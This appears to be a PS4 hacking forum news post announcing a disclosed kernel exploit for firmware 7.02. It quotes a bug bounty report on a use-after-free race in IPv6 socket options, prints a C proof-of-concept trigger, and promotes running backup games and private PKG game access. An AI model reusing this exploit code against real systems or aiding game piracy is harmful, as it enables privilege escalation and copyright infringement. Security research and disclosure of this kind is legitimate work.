Category PS4 Jailbreaking       Thread starter PSXHAX       Start date Jul 6, 2020 at 4:49 PM       190,130       440            
As promised last month, PlayStation 4 scene developer theflow0 just dropped the PS4 Kernel Exploit (KEX) for Firmware 7.02 and below which was patched by Sony in 7.50 PS4 OFW (Current OFW is 7.51) and can be chained together with a WebKit exploit like the previously released userland PS4 6.XX WebKit Exploit by Fire30_ that works up to 6.72 PS4 Firmware according to theflow0 with Mira support for 6.72 added as well! 😻
:alert: This means although today's PS4 kernel exploit works up to Firmware 7.02 there is currently only a PS4 userland exploit up to 6.72 publicly available!

Scene Dev @Al Azif suggests on Twitter that nobody should update until the full PS4 jailbreak is released, but for those who can't wait it's advisable NOT to update past 6.72 per @DEFAULTDNB on Twitter until a WebKit exploit supporting 7.02 surfaces!
:alert:

He sends thanks out to diwidog, flat_z, SpecterDev and PlayStation for the collaboration and while not all PlayStation scene developers may be on the same page with how it was handled through Sony's PlayStation Bug Bounty Program, to others it's a win-win as theflow0 received a cash bounty of $10k for his report and the PS4 scene reaped the benefit of having it publicly disclosed today for those who haven't updated to enjoy as a full jailbreak arrives! 💞

Those who'd like to show their appreciation and donate to theflow0 can do so the following ways:
  • via bitcoin 361jRJtjppd2iyaAhBGjf9GUCWnunxtZ49
  • via PayPal
  • via Patreon
To quote from the report via HackerOne.com: Use-After-Free In IPV6_2292PKTOPTIONS leading To Arbitrary Kernel R/W Primitives

Summary


Due to missing locks in option IPV6_2292PKTOPTIONS of setsockopt , it is possible to race and free the struct ip6_pktopts buffer, while it is being handled by ip6_setpktopt. This structure contains pointers (ip6po_pktinfo) that can be hijacked to obtain arbitrary kernel R/W primitives.

As a consequence, it is easy to have kernel code execution. This vulnerability is reachable from WebKit sandbox and is available in the latest FW, that is 7.02.

Attachment

Attached is a Proof-Of-Concept that achieves a Local Privilege Escalation on FreeBSD 9 and FreeBSD 12.
Impact
  • In conjunction with a WebKit exploit, a fully chained remote attack can be achieved.
  • It is possible to steal/manipulate user data.
  • Dump and run backup games.
Code:
/*
* Race condition in ip6_ctloutput where in6p is not locked when calling
* ip6_pcbopts, which allows for a use after free on in6p->in6p_outputopts
*
* Build: gcc -std=c99 -o poc poc.c -lpthread
* Run: ./poc
*
* Discovered by TJ Corley 8/15/2018
*/

#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>

#define IPV6_2292PKTOPTIONS 25

int s;

static void spam_valid() {
    char ctrl[CMSG_SPACE(sizeof(int))];

    struct cmsghdr *cmsg = (struct cmsghdr *)&ctrl;
    cmsg->cmsg_len = CMSG_LEN(4);
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_TCLASS;

    char *data = (char *)CMSG_DATA(cmsg);
    *(int *)data = 0x4;

    printf("spamming valid IPV6_2292PKTOPTIONS\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(4));
    }
}

static void spam_zero_size_mbuf() {
    char *buf[0x4] = {};
    printf("spamming zero size mbuf\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0);
    }
}

int main() {
    pthread_t t;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    pthread_create(&t, NULL, (void *)spam_valid, NULL);
    spam_zero_size_mbuf();
}
Download: PS4UPDATE.pup (995.5 MB - PS4 6.72 Recovery PUP - MD5: 8140fdd70c1061c379f08566be022ecb) / Mirror / Mirror #2 / Mirror #3 / Mirror #4 via EuropaPeixe
Download: PS4UPDATE.pup (442.4 MB - PS4 6.72 Update PUP - MD5: f3a31f64d894dc06040498cd7383bec2) / Mirror / Mirror #2 / Mirror #3 / Mirror #4 via EuropaPeixe
Cheers to @jwooh for the heads-up on the exploit news, and with Discord help for PSXHAX Member Verifications to access the private area for the latest PS4 PKG games! 🍻
PS4 Kernel Exploit (KEX) for 7.02 Firmware, Wait for Jailbreak Before Updating!.png
 

Comments

samdee

Member
Contributor
Verified
This is the best early Xmas present for us games we could all ask for especially in these uncertain times with the situation we are all facing.
 

mrcordas

Member
Contributor
Verified
Congratulations to theflow and everyone else working on the exploit!

I don't really know who the devs are, but I do know how difficult it is to solve a complex computational problem with a programming language. so I think that everyone who likes and takes advantage of the hacker scene and who can, should make a donation for the great deeds as an incentive.
 

Mobdre23

Member
Contributor
Been ready to update from 5.05 glad I haven't played most of the games yet.. But went to gamestop got mortal kombat 11 $19.99
New and nba live 19 $14.99, wolfenstein youngblood $14.99 used with free game nba 2k19..

I know I could of waited but just wanted to spend some on something lol, just to let you know I keep my disc games for backup if ps4 mess up are something.. Telling you now if you buy games better go get them while they on sale
 

moh86

Senior Member
Contributor
Wait. Does this mean we can install a "real" jailbreak like the PS3 instead of reactivating HEN inside the webbrower after each reboot? Please answer.
 
Recent Articles
PS4 Debug Watch App Port for 6.72 Firmware via Withmetta
Based on the Debug Watch utility by jogolden (Twitter) and the PS4Debug 6.72 Fork by GiantPluto (Twitter), recently I (aka withmetta) recompiled PS4 Debug Watch and got it working on PlayStation 4...
PS4 Syscon Loader Python Script for System Controller Files by SocraticBliss
Following the PS4 SysGlitch Tool and SysCon Glitching Pinout and his PS4 Unfself Tool, today PlayStation 4 developer @SocraticBliss is back with a PS4 Syscon Loader via Twitter tested with the IDA...
XNA RPKGMAN: XNA Remote Package Manager by Cypheron
Hey everyone, following PS4 PKG Sender v1.03 I have created XNA RPKGMAN: XNA Remote Package Manager which is a fully dynamic, lightweight package manager that only requires NodeJS/NPM and runs on...
Bad_Hoist PS4 Toolchain Porting Guide for Unsupported Firmware by Sleirsgoevy
Proceeding his PS4 ROP 8CC Port, Bad_Hoist 6.72 PS4 Webkit Exploit Port and preliminary Checklist to Port the Toolchain, today PlayStation 4 developer sleirsgoevy updated his Github repository...
Top